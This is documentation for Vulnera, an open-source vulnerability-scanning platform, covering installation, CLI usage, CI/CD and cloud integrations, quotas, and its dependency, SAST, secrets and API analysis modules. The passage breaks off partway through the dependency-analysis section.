Vulnera — Modular Vulnerability Analysis Platform

Vulnera is an open-source, async Rust platform for multi-ecosystem vulnerability analysis. It combines four purpose-built detection modules under a single orchestrator with sandboxed execution, a typed job pipeline, and optional LLM enrichment.

All core analysis — SAST, secrets detection, and API security — runs fully offline. Dependency CVE lookups require network access to OSV, NVD, and GHSA. LLM enrichment requires network access to the configured provider.


The Four Analysis Modules

| Module | Method | Coverage | Offline? |
|---|---|---|---|
| Dependency Analysis | CVE lookup (OSV · NVD · GHSA) | npm, PyPI, Cargo, Maven/Gradle, Go, Composer, Bundler, NuGet | ❌ No |
| SAST | Tree-sitter AST + inter-procedural taint analysis | Python, JavaScript, TypeScript, Rust, Go, C, C++ | ✅ Yes |
| Secrets Detection | Regex + entropy detection | All text files | ✅ Yes |
| API Security | Rule-based OpenAPI spec analysis | OpenAPI 3.0 / 3.1 | ✅ Yes |

LLM enrichment (Google Gemini, OpenAI, Azure OpenAI) is an optional post-processing pass — it adds explanations and fix suggestions to existing findings but is never part of detection.


Documentation Structure

Getting Started

Role-based quick-start guides:

Analysis Capabilities

Module Reference

  • Dependency Analysis — ecosystem coverage, lockfile strategy, version recommendations
  • SAST — supported languages, rule packs, confidence scoring
  • Secrets Detection — detection methods, secret types, baselines
  • API Security — analysis categories, OAuth/OIDC checks, strict mode

AI-Powered Features

Dashboard & Web Platform

Reference


Offline vs. Online Boundaries

Fully offline (no network required):

  • SAST
  • Secrets Detection
  • API Security

Requires network:

  • Dependency Analysis (OSV/NVD/GHSA lookups)
  • LLM enrichment (explanations and fixes)

Self-Hosting

The server is a single Rust binary backed by PostgreSQL and optionally Dragonfly/Redis.

Minimum requirements:

  • Rust 1.91+ (build only)
  • PostgreSQL 12+
  • Linux 5.13+ recommended (for Landlock sandbox; process isolation fallback works on older kernels)

Quick start:

export DATABASE_URL='postgresql://user:pass@localhost:5432/vulnera'
sqlx migrate run
cargo run

Full configuration reference: Configuration


License

Server and all analysis modules: AGPL-3.0-or-later

CLI, Advisors, LSP Adapter: AGPL-3.0-or-later (see each workspace’s LICENSE file)


Contributing

See the project README for the contribution guide, roadmap, and high-impact areas open for community work.

Developer Quick Start (5 Minutes)

For: Individual developers who want offline vulnerability scanning integrated into their workflow.

Goal: Run your first security analysis on a local project in under 5 minutes.

Install Vulnera CLI

Choose your platform:

macOS

curl -L https://github.com/Vulnera-rs/Vulnera/releases/latest/download/vulnera-macos-aarch64 -o vulnera
chmod +x vulnera
sudo mv vulnera /usr/local/bin/

Linux

curl -L https://github.com/Vulnera-rs/Vulnera/releases/latest/download/vulnera-linux-x86_64 -o vulnera
chmod +x vulnera
sudo mv vulnera /usr/local/bin/

Windows

Download the binary from GitHub Releases and add it to your PATH.

Verify Installation

vulnera --version
# Output: Vulnera 0.5.1

Run Your First Analysis (Offline)

# Analyze your current project
vulnera analyze .

# Or any directory
vulnera analyze /path/to/my/nodejs-app

What happens:

  • ✅ Scans all code files for security issues
  • ✅ Detects hardcoded secrets (API keys, tokens, credentials)
  • ✅ Checks for code injection vulnerabilities
  • ✅ Analyzes OpenAPI specs if present
  • ⏱️ Takes 1-10 seconds depending on project size

Output (default table view):

┌─────────────────────────────────────────────────────────────┐
│ Vulnera Security Analysis Report                            │
├─────────────────────────────────────────────────────────────┤
│ Analysis Duration: 2.3 seconds                              │
│ Modules Run: SAST, Secrets, API                             │
│ Total Findings: 5                                           │
├──────────┬───────┬───────────────┬──────────────────────────┤
│ SEVERITY │ COUNT │ MODULE        │ REMEDIATION              │
├──────────┼───────┼───────────────┼──────────────────────────┤
│ HIGH     │ 2     │ Secrets       │ Remove hardcoded keys    │
│ MEDIUM   │ 2     │ SAST (Python) │ Use parameterized queries│
│ LOW      │ 1     │ API Spec      │ Add security headers     │
└──────────┴───────┴───────────────┴──────────────────────────┘

See Detailed Findings

vulnera analyze . --format json | jq '.findings[]'

Sample finding:

{
  "id": "SAST-SQL-001",
  "type": "SQL Injection",
  "severity": "high",
  "file": "app.py",
  "line": 42,
  "message": "User input concatenated into SQL query",
  "code": "query = f\"SELECT * FROM users WHERE id={user_id}\"",
  "remediation": "Use parameterized queries: db.query('SELECT * FROM users WHERE id=?', [user_id])"
}
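
The JSON output is easy to script against. A minimal sketch of a CI gate that blocks on high-severity findings, using a hand-written sample in place of real analyzer output:

```shell
# Hand-written sample in the same shape as `vulnera analyze . --format json` output
cat > findings.json <<'EOF'
{"findings": [
  {"id": "SAST-SQL-001", "severity": "high"},
  {"id": "SECRET-AWS-002", "severity": "high"},
  {"id": "API-HDR-003", "severity": "low"}
]}
EOF

# Count high-severity findings (grep keeps the sketch dependency-free)
HIGH=$(grep -c '"severity": "high"' findings.json)
echo "high findings: $HIGH"

# Gate: fail the build when any high-severity finding exists
if [ "$HIGH" -gt 0 ]; then
  echo "blocking: $HIGH high-severity findings"
fi
```

In a real pipeline the heredoc is replaced by the actual analyzer output (or `jq` is used for robust JSON handling).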

Get AI-Powered Explanations

Want to understand why a finding is important?

# Option 1: Output directly shows summaries
vulnera analyze . --format table

# Option 2: Export to JSON and filter
vulnera analyze . --format json | jq '.findings[] | {id, type, message, remediation}'

Authenticate for Extra Features

Get 4x more quota and enable dependency scanning:

# Get API key at: https://vulnera.studio/dashboard/keys
vulnera auth login --api-key YOUR_API_KEY

# Now you can scan dependencies
vulnera analyze . --all-modules

Pre-Commit Integration

Automatically scan before commits:

Add to .git/hooks/pre-commit

#!/bin/sh
# Run Vulnera on the working tree (exits non-zero when high-severity findings exist)
vulnera analyze . --severity high

if [ $? -ne 0 ]; then
  echo "❌ Security issues found. Fix before committing."
  exit 1
fi

Make it Executable

chmod +x .git/hooks/pre-commit

Test It

git add .
git commit -m "test"
# Will run Vulnera scan before commit

CI/CD Integration

GitHub Actions

Create .github/workflows/security.yml:

name: Security Analysis

on: [push, pull_request]

jobs:
  vulnera:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Download Vulnera CLI
        run: |
          curl -L https://github.com/Vulnera-rs/Vulnera/releases/latest/download/vulnera-linux-x86_64 -o vulnera
          chmod +x vulnera
      - run: ./vulnera analyze . --severity high

GitLab CI

Add to .gitlab-ci.yml:

security:
  script:
    - curl -L https://github.com/Vulnera-rs/Vulnera/releases/latest/download/vulnera-linux-x86_64 -o vulnera
    - chmod +x vulnera
    - ./vulnera analyze . --severity high

Common Commands

# Skip code analysis (SAST); other modules still run
vulnera analyze . --skip-sast

# Show only high/critical severity
vulnera analyze . --severity high

# Export to SARIF (for IDE integration)
vulnera analyze . --format sarif > report.sarif

# Check your quota
vulnera quota

# Offline mode (don't use dependency scanning)
vulnera analyze . --offline

Next Steps

  1. Integrate into your IDE: IDE Extensions
  2. Learn about all analysis types: Analysis Capabilities
  3. Get AI-powered explanations: LLM Features
  4. Set up for team usage: DevSecOps Quick Start

Troubleshooting

Q: No findings found—is it working? A: Most likely, yes. No findings means nothing was detected, not that the code is guaranteed secure. Run with --show-passed to see every check that ran.

Q: Getting “permission denied” error? A: Make sure the binary is executable: chmod +x vulnera

Q: Want to see what’s detected? A: Run with verbose output: vulnera analyze . -v

Q: Dependency scanning not working? A: You need to authenticate. Get an API key at https://vulnera.studio/dashboard/keys


Questions? Join us on Discord or check the full documentation.

DevSecOps Quick Start (10 Minutes)

For: Security team leads and DevSecOps engineers managing organization-wide vulnerability scanning.

Goal: Set up team-based security scanning with shared quotas, analytics, and multi-project orchestration.

Step 1: Create Organization

vulnera organizations create \
  --name "Engineering Security Team" \
  --description "Security scanning for all projects"

Output:

Organization created: org-abc123
Shared daily quota: 48 tokens (vs 40 for single user)
Admin URL: https://vulnera.studio/orgs/org-abc123/settings

Step 2: Invite Team Members

# Invite security engineer
vulnera organizations add-member \
  --org org-abc123 \
  --email alice@company.com \
  --role admin

# Invite developer with view-only access
vulnera organizations add-member \
  --org org-abc123 \
  --email bob@company.com \
  --role viewer

Roles

| Role | Capabilities |
|---|---|
| Owner | Create/delete org, manage members, billing, analytics |
| Admin | Run scans, manage members, view analytics |
| Analyst | Run scans, view results, comment on findings |
| Viewer | View-only access to results and analytics |

Step 3: Setup Continuous Scanning

GitHub Organization Integration

# Store Vulnera API key as GitHub secret
# Go to Settings → Secrets and variables → Actions → New repository secret
# Name: VULNERA_API_KEY
# Value: (get from vulnera dashboard)

Create .github/workflows/vulnera-scan.yml:

name: Vulnera Security Scan

on:
  push:
    branches: [main, develop]
  pull_request:
    branches: [main]
  schedule:
    - cron: "0 2 * * *" # Daily at 2 AM

jobs:
  vulnera:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 0

      - name: Download Vulnera CLI
        run: |
          curl -L https://github.com/Vulnera-rs/Vulnera/releases/latest/download/vulnera-linux-x86_64 -o vulnera
          chmod +x vulnera

      - name: Run Full Security Analysis
        env:
          VULNERA_API_KEY: ${{ secrets.VULNERA_API_KEY }}
        run: |
          ./vulnera analyze . \
            --all-modules \
            --format json \
            --output vulnera-report.json

      - name: Report Results
        run: |
          ./vulnera report vulnera-report.json \
            --format github \
            --post-to-pr

Step 4: View Organization Analytics

# Get team usage summary
vulnera organizations analytics dashboard --org org-abc123

# Get historical usage (last 3 months)
vulnera organizations analytics usage --org org-abc123 --months 3

Sample output:

Organization: Engineering Security Team
Period: December 2024

Daily Usage Trend:
  Dec 1:  ▄ 28 tokens (70%)
  Dec 2:  █ 47 tokens (98%) ← Peak
  Dec 3:  ▂ 12 tokens (30%)
  Avg:    ▃ 31 tokens (65%)

Per-Member Breakdown:
  Alice (alice@company.com): 156 tokens (52%)
  Bob (bob@company.com):     89 tokens (30%)
  Charlie (charlie@...):      54 tokens (18%)

Recommendations:
  - High usage on Dec 2. Consider optimizing batch operations.
  - LLM features used 45% of quota. See quota-pricing.md for cost details.

Step 5: Create Shared Scanning Policies

Severity Filters

# Define which issues to alert on
vulnera organizations policy create \
  --org org-abc123 \
  --name "Production Policy" \
  --min-severity critical,high \
  --affected-projects "*-prod"

Exemptions

# Exclude known false positives
vulnera organizations policy exempt \
  --org org-abc123 \
  --finding-id SAST-SQL-001 \
  --reason "Legacy code, deprecated but functional" \
  --expires 2025-06-30

Step 6: Setup Notifications

Slack Integration

# Get Vulnera webhook URL from dashboard
vulnera organizations integrations connect slack \
  --org org-abc123 \
  --webhook-url https://hooks.slack.com/services/YOUR/WEBHOOK/URL

Notification Rules

# Alert on any critical finding
vulnera organizations notifications create \
  --org org-abc123 \
  --name "Critical Alerts" \
  --condition "severity == critical" \
  --channel slack

# Weekly summary
vulnera organizations notifications create \
  --org org-abc123 \
  --name "Weekly Summary" \
  --condition "summary" \
  --frequency weekly \
  --channel email

Step 7: Scan Multiple Repositories

# Create scanning profile
vulnera organizations profile create \
  --org org-abc123 \
  --name "Standard Scan" \
  --modules "sast,secrets,deps,api" \
  --severity-threshold "high"

# Scan repositories
vulnera scan-repos \
  --org org-abc123 \
  --profile "Standard Scan" \
  --repos "my-org/repo-1,my-org/repo-2,my-org/repo-3"

Step 8: Monitor and Report

Dashboard View

# Open web dashboard
open https://vulnera.studio/orgs/org-abc123/dashboard

Shows:

  • Real-time scan status
  • Vulnerability trends
  • Team member activity
  • Quota usage
  • Historical comparisons

Export Reports

# Export findings to compliance format
vulnera organizations report export \
  --org org-abc123 \
  --format sarif \
  --period "last-month" \
  --output compliance-report.sarif

# Email to stakeholders
vulnera organizations report email \
  --org org-abc123 \
  --recipients security-team@company.com \
  --include-recommendations

Quota Management for Teams

Shared Quota Model

Organization Daily Quota: 48 tokens

Typical usage:
  Monday (high activity):    45 tokens
  Tuesday (low activity):     8 tokens
  Wednesday-Friday (average): 20 tokens each

Weekly pattern: Usually peaks Monday, dips on weekends
Recommendation: Schedule large scans Monday morning
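
The sample week above can be tallied to see how close the team runs to the 48-token quota. A quick awk sketch (figures are the illustrative ones from the sample, with Wednesday–Friday at the stated 20-token average, not live data):

```shell
# Illustrative daily usage from the sample week above
cat > usage.txt <<'EOF'
Mon 45
Tue 8
Wed 20
Thu 20
Fri 20
EOF

# Total, daily average, and peak day as a share of the 48-token org quota
SUMMARY=$(awk '{sum += $2; if ($2 > max) max = $2}
  END { printf "total=%d avg=%.1f peak_pct=%.0f%%", sum, sum/NR, max/48*100 }' usage.txt)
echo "$SUMMARY"
```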

Cost Optimization

# Only scan high/critical severity to save quota
vulnera analyze . --severity high

# Batch LLM explanations (one 6-token batch request instead of 6 tokens per finding)
vulnera analyze . --batch-llm-enrich

# Use the shared organizational quota (48 tokens vs 40 individual)
# That's 20% more daily quota for the team

Integration Examples

Jira Integration

Auto-create Jira tickets for high-severity findings:

vulnera organizations integrations connect jira \
  --org org-abc123 \
  --jira-url https://company.atlassian.net \
  --api-token YOUR_TOKEN \
  --auto-create-issues \
  --severity-threshold high

Datadog/New Relic APM

Send security metrics to monitoring:

vulnera organizations integrations connect datadog \
  --org org-abc123 \
  --api-key YOUR_DATADOG_KEY \
  --send-metrics \
  --metric-tags "team:security,env:prod"

Common Workflows

Scan on Every Push

# GitHub Actions workflow (see Step 3)
# Results appear as GitHub check
# PR comments show new findings
# Auto-block PRs with critical issues (optional)

Scan on Merge Request

# GitLab CI pipeline
# Results in MR discussion
# Approve/block based on findings

Weekly Security Reports

# Cron job to generate reports
0 9 * * 1 vulnera report generate --org org-abc123 --email security@company.com

Monitoring & Alerting

# Setup alert for quota approaching limit
vulnera organizations alerts create \
  --org org-abc123 \
  --alert "quota_threshold" \
  --threshold 90 \
  --action "email-admin"

# Alert on policy violations
vulnera organizations alerts create \
  --org org-abc123 \
  --alert "policy_violation" \
  --action "slack-notification"

Next Steps

  1. Understand quota costs: Quota & Pricing
  2. Create custom analysis policies: Policy Configuration

Need help? Contact support or join our security community Discord.

Quota & Pricing

This document explains how local CLI quotas and server rate limits work, and how they differ.


Two Separate Systems

1) CLI Local Quota (Per Machine)

The CLI enforces a local daily request limit and persists usage on the machine.

Limits (CLI):

  • Unauthenticated: 10 requests/day
  • Authenticated (API key): 40 requests/day

Where this lives:

  • Stored locally by the CLI (per machine)
  • Reset at UTC midnight
  • You can check status with vulnera quota

Commands:

vulnera auth status
vulnera quota
vulnera quota sync

Notes:

  • The CLI quota is a local guardrail and can be synced with server state if the server is reachable.
  • Offline mode uses local quota only.

2) Server Rate Limits (API)

The server enforces tiered rate limits and token costs per request. This is authoritative for hosted/self-hosted API usage.

Default tiers (from config/default.toml):

  • API key: 100 req/min, 2000 req/hour, burst 20
  • Authenticated (cookie): 60 req/min, 1000 req/hour, burst 10
  • Anonymous: 10 req/min, 100 req/hour, burst 5
  • Org bonus: +20% to tier limits

Token cost weights (per request):

  • GET = 1
  • POST/PUT/DELETE = 2
  • Analysis = 3
  • LLM = 6

These costs apply to the server-side rate limiter, not the CLI local tracker.
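
To estimate server-side spend, multiply request counts by the weights above. A back-of-the-envelope sketch (request counts are hypothetical):

```shell
# Cost weights from the server-side rate limiter
GET=1; MUTATE=2; ANALYSIS=3; LLM=6

# Hypothetical day: 50 GETs, 10 mutating calls, 5 analysis jobs, 3 LLM enrichments
COST=$((50*GET + 10*MUTATE + 5*ANALYSIS + 3*LLM))
echo "estimated daily token cost: $COST"
```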


Practical Examples

CLI (Local)

  • vulnera analyze . → consumes 1 local request
  • vulnera deps . → consumes 1 local request + server usage

Server (API)

  • POST /api/v1/analyze/job → cost analysis = 3
  • POST /api/v1/llm/explain → cost llm = 6
  • GET /api/v1/quota → cost get = 1

How to Check Usage

CLI (Local)

vulnera quota

Server (API)

curl https://api.vulnera.studio/api/v1/quota \
  -H "X-API-Key: <your_api_key>"

Configuration (Server)

Server limits live in config/default.toml:

  • server.rate_limit.tiers.* for rate tiers
  • server.rate_limit.costs.* for request cost weights
  • server.rate_limit.tiers.org_bonus_percent

Override with environment variables using the VULNERA__ prefix.


Guidance

  • Use the CLI locally for offline modules (SAST, Secrets, API).
  • Use server-backed analysis for dependency scanning and LLM features.
  • Batch LLM enrichment to reduce total cost.

Troubleshooting

Local CLI says quota exceeded

  • Wait for UTC reset or authenticate for 40/day
  • Use vulnera auth login and vulnera quota

Server returns 429

  • You’ve exceeded the configured server tier limits
  • Reduce request volume or increase limits in server config

Cloud Engineer Quick Start (10 Minutes)

For: Cloud/infrastructure engineers scanning S3 buckets, repositories, and cloud-hosted projects.

Goal: Scan cloud resources at scale with automated workflows.

Step 1: Install & Authenticate

# Install CLI
curl -L https://github.com/Vulnera-rs/Vulnera/releases/latest/download/vulnera-linux-x86_64 -o vulnera
chmod +x vulnera

# Authenticate with API key (get from https://vulnera.studio/dashboard/keys)
vulnera auth login --api-key YOUR_API_KEY

Step 2: Scan S3 Buckets

Scan Single Bucket

vulnera analyze s3://my-bucket/src \
  --aws-profile default \
  --recursive

Scan Multiple Buckets

# Create scanning config
cat > s3-scan-config.toml << EOF
[buckets]
include_patterns = ["prod-*", "app-*"]
exclude_patterns = ["archive-*", "temp-*"]
max_file_size = 1000000  # 1MB
EOF

vulnera analyze-cloud s3 \
  --config s3-scan-config.toml \
  --format json \
  --output s3-findings.json
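
The include/exclude semantics of the config above can be illustrated with plain shell glob matching (bucket names are made up; the real selection happens inside the scanner):

```shell
# Hypothetical bucket names
BUCKETS="prod-web app-api archive-2023 temp-scratch prod-data"

SELECTED=""
for b in $BUCKETS; do
  case "$b" in
    archive-*|temp-*) continue ;;                 # exclude_patterns take priority
    prod-*|app-*)     SELECTED="$SELECTED $b" ;;  # include_patterns
  esac
done
SELECTED="${SELECTED# }"
echo "would scan: $SELECTED"
```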

AWS Credentials

# Use AWS profile
export AWS_PROFILE=production
vulnera analyze s3://production-bucket/

# Or explicit credentials
export AWS_ACCESS_KEY_ID=AKIA...
export AWS_SECRET_ACCESS_KEY=...
vulnera analyze s3://my-bucket/

Step 3: Scan GitHub Repositories

Single Repository

vulnera analyze github://owner/repo \
  --branch main \
  --depth full

Organization-Wide Scan

# Scan all repositories in organization
vulnera scan-repos \
  --source github \
  --org my-company \
  --visibility public,private \
  --output org-findings.json

Exclude Patterns

vulnera scan-repos \
  --source github \
  --org my-company \
  --exclude "tests/*,vendor/*,node_modules/*" \
  --max-file-size 1000000

Step 4: Cloud-Native CI/CD Pipelines

AWS CodePipeline

# buildspec.yml
version: 0.2

phases:
  install:
    commands:
      - curl -L https://github.com/Vulnera-rs/Vulnera/releases/latest/download/vulnera-linux-x86_64 -o vulnera
      - chmod +x vulnera

  build:
    commands:
      - ./vulnera analyze . --all-modules --format json --output vulnera-findings.json
      - ./vulnera report vulnera-findings.json --format codepipeline

artifacts:
  files:
    - vulnera-findings.json

Azure Pipelines

trigger:
  - main

pool:
  vmImage: 'ubuntu-latest'

steps:
  - task: DownloadSecureFile@1
    inputs:
      secureFile: 'vulnera-api-key'

  - script: |
      curl -L https://github.com/Vulnera-rs/Vulnera/releases/latest/download/vulnera-linux-x86_64 -o vulnera
      chmod +x vulnera
      ./vulnera auth login --api-key $(cat $(Agent.TempDirectory)/vulnera-api-key)
      ./vulnera analyze . --all-modules

  - task: PublishBuildArtifacts@1
    inputs:
      pathToPublish: 'vulnera-findings.json'

GCP Cloud Build

steps:
  - name: 'gcr.io/cloud-builders/docker'
    args:
      - 'build'
      - '-t'
      - 'gcr.io/$PROJECT_ID/vulnera-scanner'
      - '.'

  - name: 'gcr.io/$PROJECT_ID/vulnera-scanner'
    env:
      - 'VULNERA_API_KEY=$_VULNERA_API_KEY'
    args:
      - 'analyze'
      - '/workspace'
      - '--all-modules'
      - '--format'
      - 'json'

Step 5: Kubernetes & Container Scanning

Scan Docker Images

# Before pushing to registry
docker run -v /path/to/app:/app vulnera-scanner \
  analyze /app \
  --all-modules \
  --severity high

Kubernetes Deployment

# kubernetes-job.yaml
apiVersion: batch/v1
kind: CronJob
metadata:
  name: vulnera-scanner
spec:
  schedule: "0 2 * * *"  # 2 AM daily
  jobTemplate:
    spec:
      template:
        spec:
          containers:
          - name: vulnera
            image: vulnera-scanner:latest
            env:
            - name: VULNERA_API_KEY
              valueFrom:
                secretKeyRef:
                  name: vulnera-credentials
                  key: api-key
            command:
            - sh
            - -c
            - |
              vulnera analyze /source --all-modules --format json > /results/findings.json
              vulnera report /results/findings.json --format kubernetes
            volumeMounts:
            - name: source
              mountPath: /source
            - name: results
              mountPath: /results
          volumes:
          - name: source
            emptyDir: {}
          - name: results
            persistentVolumeClaim:
              claimName: scan-results-pvc
          restartPolicy: OnFailure

Step 6: Terraform Scanning

Scan Infrastructure Code

# Scan Terraform modules for security issues
vulnera analyze ./terraform \
  --format json \
  --output tf-findings.json

# Filter by resource type
vulnera findings filter \
  --input tf-findings.json \
  --resource-type aws_security_group \
  --output sg-issues.json

Terraform Module Registry Integration

# main.tf
module "vulnera_scan" {
  source = "git::https://github.com/Vulnera-rs/Vulnera.git//terraform/modules/scanner"

  bucket_name = "my-infrastructure"
  schedule    = "cron(0 2 * * ? *)"  # Daily at 2 AM

  tags = {
    Environment = "production"
  }
}

Step 7: Multi-Cloud Scanning

Scan All Cloud Resources

# Scan across multiple cloud providers
vulnera scan-cloud \
  --providers aws,azure,gcp \
  --config multi-cloud-config.toml \
  --parallel 10

# Results aggregated by resource type
vulnera report cloud-findings.json \
  --group-by provider \
  --format html

Configuration Example

[aws]
regions = ["us-east-1", "us-west-2", "eu-west-1"]
include_s3 = true
include_ec2_images = true
include_rds = true

[azure]
subscriptions = ["prod", "staging"]
include_storage = true

[gcp]
projects = ["project-prod", "project-staging"]
include_storage = true

Step 8: Automated Compliance Reporting

Generate Compliance Reports

# SOC 2 Report
vulnera report generate \
  --format soc2 \
  --period month \
  --include-trends \
  --output soc2-compliance.html

# HIPAA Report
vulnera report generate \
  --format hipaa \
  --include-remediation \
  --output hipaa-compliance.html

Email Reports Automatically

# Schedule weekly reports
vulnera organizations notifications create \
  --org my-cloud-team \
  --name "Weekly Cloud Security" \
  --frequency weekly \
  --day monday \
  --time 9:00 \
  --recipients security@company.com

Common Cloud Workflows

Daily S3 Compliance Check

#!/bin/bash
# daily-s3-scan.sh

BUCKET="production-data"
DATE=$(date +%Y-%m-%d)
REPORT_DIR="/var/reports/vulnera"

vulnera analyze "s3://${BUCKET}" \
  --recursive \
  --format json \
  --output "${REPORT_DIR}/${DATE}-findings.json"

# Alert if critical findings
CRITICAL_COUNT=$(jq '[.findings[] | select(.severity=="critical")] | length' "${REPORT_DIR}/${DATE}-findings.json")

if [ "$CRITICAL_COUNT" -gt 0 ]; then
  echo "Critical findings in $BUCKET: $CRITICAL_COUNT" | \
    mail -s "ALERT: S3 Security Issues" security@company.com
fi

Multi-Region Analysis

# Parallel scanning across regions
for region in us-east-1 us-west-2 eu-west-1; do
  vulnera analyze-cloud s3 \
    --region $region \
    --output findings-${region}.json &
done
wait

Performance Optimization

Parallel Processing

# Scan multiple buckets in parallel
vulnera analyze-cloud s3 \
  --parallel-jobs 10 \
  --max-file-workers 8

Caching

# Enable caching (24-hour default)
vulnera analyze s3://bucket \
  --cache enabled \
  --cache-ttl 86400
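
Conceptually, a TTL cache compares an entry's age against the TTL and reuses the entry while it is younger. A toy sketch of that check (not vulnera's actual cache implementation):

```shell
TTL=86400                        # 24 hours, matching --cache-ttl above

# Record when a (mock) cache entry was written
date +%s > cache.stamp

NOW=$(date +%s)
AGE=$(( NOW - $(cat cache.stamp) ))

# Entry younger than the TTL -> serve from cache; otherwise rescan
if [ "$AGE" -lt "$TTL" ]; then
  STATUS="hit"
else
  STATUS="miss (expired)"
fi
echo "cache $STATUS (age ${AGE}s, ttl ${TTL}s)"
```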

Large Scale Scans

# For enterprise environments
vulnera analyze-cloud \
  --batch-size 1000 \
  --queue-depth 500 \
  --workers 32 \
  --output enterprise-findings.json

Next Steps

  1. Set up an organization for team coordination: DevSecOps Quick Start
  2. Understand quotas for large-scale scans: Quota & Pricing

Need enterprise support? Contact sales@vulnera.studio

Analysis Capabilities Overview

Vulnera provides four specialized analysis modules powered by purpose-built detection techniques. Each module is independently selectable and produces findings in a unified schema.

The Four Analysis Modules

| Module | Purpose | Method | Offline? | Coverage |
|---|---|---|---|---|
| Dependency Analysis | Find known CVEs in third-party packages | Registry lookup (OSV · NVD · GHSA) | ❌ No | npm, PyPI, Cargo, Maven/Gradle, Go, Composer, Bundler, NuGet |
| SAST | Find security flaws in source code | Tree-sitter AST + inter-procedural taint analysis | ✅ Yes | Python, JavaScript, TypeScript, Rust, Go, C, C++ |
| Secrets Detection | Find exposed credentials and tokens | Regex + entropy detection | ✅ Yes | All text files |
| API Security | Find misconfigurations in API specs | Rule-based spec analysis | ✅ Yes | OpenAPI 3.0 / 3.1 |

LLM enrichment (Google Gemini, OpenAI, Azure OpenAI) is a separate post-processing pass that explains and proposes fixes for findings produced by the modules above. It is never part of detection and requires network access.


How Module Selection Works

The orchestrator uses RuleBasedModuleSelector to automatically activate modules based on file patterns and analysis depth. You do not need to specify modules manually — the right ones run based on what is in the project.

Incoming source (directory / git / S3)
        │
        ▼
  File pattern detection
        │
        ├─ dependency manifests found?  → Dependency Analysis
        ├─ .py / .js / .ts / .rs / .go / .c / .cpp files?  → SAST
        ├─ all files  → Secrets Detection (always runs in Full)
        └─ openapi.yaml / openapi.json / swagger.yaml found?  → API Security
        │
        ▼
  Parallel execution (one sandbox per module)
        │
        ▼
  Aggregated findings report
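
The selection flow above can be mimicked with a few file-pattern checks. This is a toy approximation of what RuleBasedModuleSelector does, not its real implementation:

```shell
# Build a toy project layout
mkdir -p demo && cd demo
touch app.py package.json openapi.yaml

MODULES="secrets"                                    # secrets always runs in Full
[ -f package.json ] || [ -f requirements.txt ] && MODULES="$MODULES deps"
ls *.py *.js *.ts *.rs *.go *.c *.cpp 2>/dev/null | grep -q . && MODULES="$MODULES sast"
[ -f openapi.yaml ] || [ -f openapi.json ] && MODULES="$MODULES api"

echo "selected modules: $MODULES"
cd ..
```

With the three files above present, all four modules would be selected.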

Analysis Depth (Orchestrator)

The orchestrator uses a coarse analysis depth to decide which modules to run:

| Depth | Description | Modules |
|---|---|---|
| dependencies_only | Dependencies only | deps |
| fast_scan | Fast scan (dependencies + minimal code analysis) | deps + sast |
| full | Full analysis (all applicable modules) | deps + sast + secrets + api |

Note: Module coverage still depends on project content. For example, SAST only runs if supported source files are present, and API Security only runs if an OpenAPI spec is detected.


Analysis Depth (SAST)

The SAST module has its own depth semantics (separate from orchestrator depth):

| Depth | Description |
|---|---|
| quick | Fast pattern matching only (no data-flow analysis) |
| standard | Balanced analysis (patterns + intra-procedural data flow) |
| deep | Full analysis (patterns + data flow + call graph + inter-procedural) |

Dynamic depth adjustment is enabled by default. Large repositories are auto-downgraded to keep scans within time budgets. Disable via VULNERA__SAST__DYNAMIC_DEPTH_ENABLED=false.


Offline vs. Online Capabilities

Fully offline (no network required)

  • SAST — rule packs embedded at compile time
  • Secrets Detection — regex + entropy detection locally
  • API Security — OpenAPI rules locally

Requires network

  • Dependency Analysis — CVE lookup against OSV, NVD, GHSA, and registries
  • LLM enrichment — explanations and fixes via external providers

Unified Finding Schema

Every module emits findings in the same structure:

{
  "id": "SAST-PY-SQL-001",
  "type": "vulnerability",
  "rule_id": "python-sql-injection",
  "location": {
    "path": "src/db.py",
    "line": 42,
    "column": 5,
    "end_line": 42,
    "end_column": 48
  },
  "severity": "high",
  "confidence": "high",
  "description": "User input concatenated directly into SQL query.",
  "recommendation": "Use parameterized queries or a query builder.",
  "secret_metadata": null,
  "vulnerability_metadata": {
    "snippet": "query = f\"SELECT * FROM users WHERE id={user_id}\"",
    "bindings": null,
    "semantic_path": null
  },
  "enrichment": null
}

The enrichment field is populated only when LLM enrichment is requested after analysis; secret_metadata is only present for secret findings.
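
Because every module shares this schema, downstream tooling can treat findings uniformly. For example, locations flatten naturally into editor-friendly path:line:column strings. A jq-free sketch on a hand-written sample finding (real pipelines would typically use jq):

```shell
# Hand-written sample finding (subset of the unified schema)
cat > finding.json <<'EOF'
{
  "id": "SAST-PY-SQL-001",
  "location": { "path": "src/db.py", "line": 42, "column": 5 },
  "severity": "high"
}
EOF

# Extract path/line/column with sed (FPATH avoids clobbering $PATH)
FPATH=$(sed -n 's/.*"path": "\([^"]*\)".*/\1/p' finding.json)
LINE=$(sed -n 's/.*"line": \([0-9]*\).*/\1/p' finding.json)
COL=$(sed -n 's/.*"column": \([0-9]*\).*/\1/p' finding.json)
echo "${FPATH}:${LINE}:${COL}"
```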


Module-Specific Documentation

  • Dependency Analysis — ecosystem coverage, lockfile strategy, version recommendations
  • SAST — supported languages, rule packs, taint analysis, confidence scoring
  • Secrets Detection — detection methods, secret types, baselines
  • API Security — analysis categories, detected issue types, strict mode

Dependency Analysis

The Dependency Analysis module scans dependency manifests and lockfiles across multiple ecosystems to identify known vulnerabilities. It requires network access for CVE lookups (OSV, NVD, GHSA).

Supported Ecosystems

| Ecosystem | Files |
|---|---|
| Python (PyPI) | requirements.txt, Pipfile, pyproject.toml |
| Node.js (npm) | package.json, package-lock.json, yarn.lock |
| Java (Maven/Gradle) | pom.xml, build.gradle |
| Rust (Cargo) | Cargo.toml, Cargo.lock |
| Go | go.mod, go.sum |
| PHP (Composer) | composer.json, composer.lock |
| Ruby (Bundler) | Gemfile, Gemfile.lock |
| .NET (NuGet) | packages.config, *.csproj, *.props, *.targets |

Online Requirement

Dependency analysis requires a server connection to query vulnerability sources:

  • OSV
  • NVD
  • GHSA

Running in offline mode skips dependency analysis.

Resolution Strategy

Vulnera uses a hybrid resolution approach:

  • Lockfile-first — Extracts a fully resolved dependency tree from lockfiles for accurate transitive coverage.
  • Manifest-only fallback — Best-effort resolution via registry metadata when lockfiles are absent.

Known gaps: Lockfile-independent transitive resolution is incomplete for some ecosystems (notably npm and PyPI).
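
Lockfile-first is more precise because a lockfile pins exact resolved versions, so no registry guesswork is needed. A toy extraction from a simplified, hand-written npm-style lockfile fragment:

```shell
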